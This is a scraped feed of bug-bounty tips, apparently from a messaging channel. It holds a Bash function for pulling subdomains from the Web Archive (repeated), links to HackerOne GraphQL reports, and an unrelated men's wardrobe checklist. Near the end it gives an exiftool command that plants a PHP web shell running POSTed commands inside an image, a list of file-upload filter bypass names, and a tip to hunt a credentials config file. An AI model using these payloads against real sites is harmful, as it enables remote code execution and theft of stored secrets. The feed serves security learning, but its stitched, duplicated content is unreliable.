Bug bounty Tips

Subdomain Enumaration Using Web Archive This is a Bash function for extracting subdomains from Web Archive results. You can add this function to your ~/.bashrc file.

function wayback() {
  curl -sk "http://web.archive.org/cdx/search/cdx?url=*.$1&output=txt&fl=original&collapse=urlkey&page=" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u
}

🔖 Subdomain Enumaration Using Web Archive This is a Bash function for extracting subdomains from Web Archive results. You can add this function to your ~/.bashrc file.

function wayback() {
  curl -sk "http://web.archive.org/cdx/search/cdx?url=*.$1&output=txt&fl=original&collapse=urlkey&page=" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u
}

#InfoSec #CyberSecurity #Hacking #BugBountyTips #BugBountyTools #SubdomainEnumeration #BugBounty 🔹 Share & Support Us 🔹 📱 Channel : @Hide_Club

Wordlists for pentesters

Stored XSS Critical or NOT?: https://medium.com/@mrro0o0tt/stored-xss-critical-or-not-da9eb9b19029?source=rss------bug_bounty-5

#justforinfo if you are a men then your wardrobe should at least have: 1 pair of navy blue chinos, 1 pair of beige chinos, 1 pair of jeans, 1 pair of black trousers, 3 pairs of slacks/suit pants; black, navy blue, grey, 1 pair of beige linen trousers, 3 white t-shirts, 3 black t-shirts, 3 navy blue t-shirts, 1 white shirt, 1 white linen shirt with short sleeves, 1 black shirt, 1 navy blue shirt, 3 polos in neutral colors, 1 suit jacket (matching one of your slacks - one complete suit), 1 neutral jacket, 2 belts (brown and black), 1 pair of white sneakers, 2 pair of Oxfords (blown and black - to match your belts), 2 sweatshirts in neutral colors, 1 hoodie.

Here are few Good GraphQl report to learn more about it. 1. hackerone.com/reports/2048725 2. hackerone.com/reports/2524939 3. hackerone.com/reports/2357012 4. hackerone.com/reports/2122671 5. hackerone.com/reports/2207248 6. hackerone.com/reports/1864188 7. hackerone.com/reports/1085332 8. hackerone.com/reports/1084904 9. hackerone.com/reports/1293377 10. hackerone.com/reports/1192460

EXIFTOOL + file UPLOAD Tips : $ exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg // File Upload bypass file.php%20 file.php%0a file.php%00 file.php%0d%0a file.php/ file.php.\ file. file.php.... file.pHp5.... file.png.php file.png.pHp5 file.php%00.png file.php\x00.png file.php%0a.png file.php%0d%0a.png flile.phpJunk123png file.png.jpg.php file.php%00.png%00.jpg

Add the file yahoo_site_admin/credentials/db.conf to your wordlist, and you might discover some juicy data.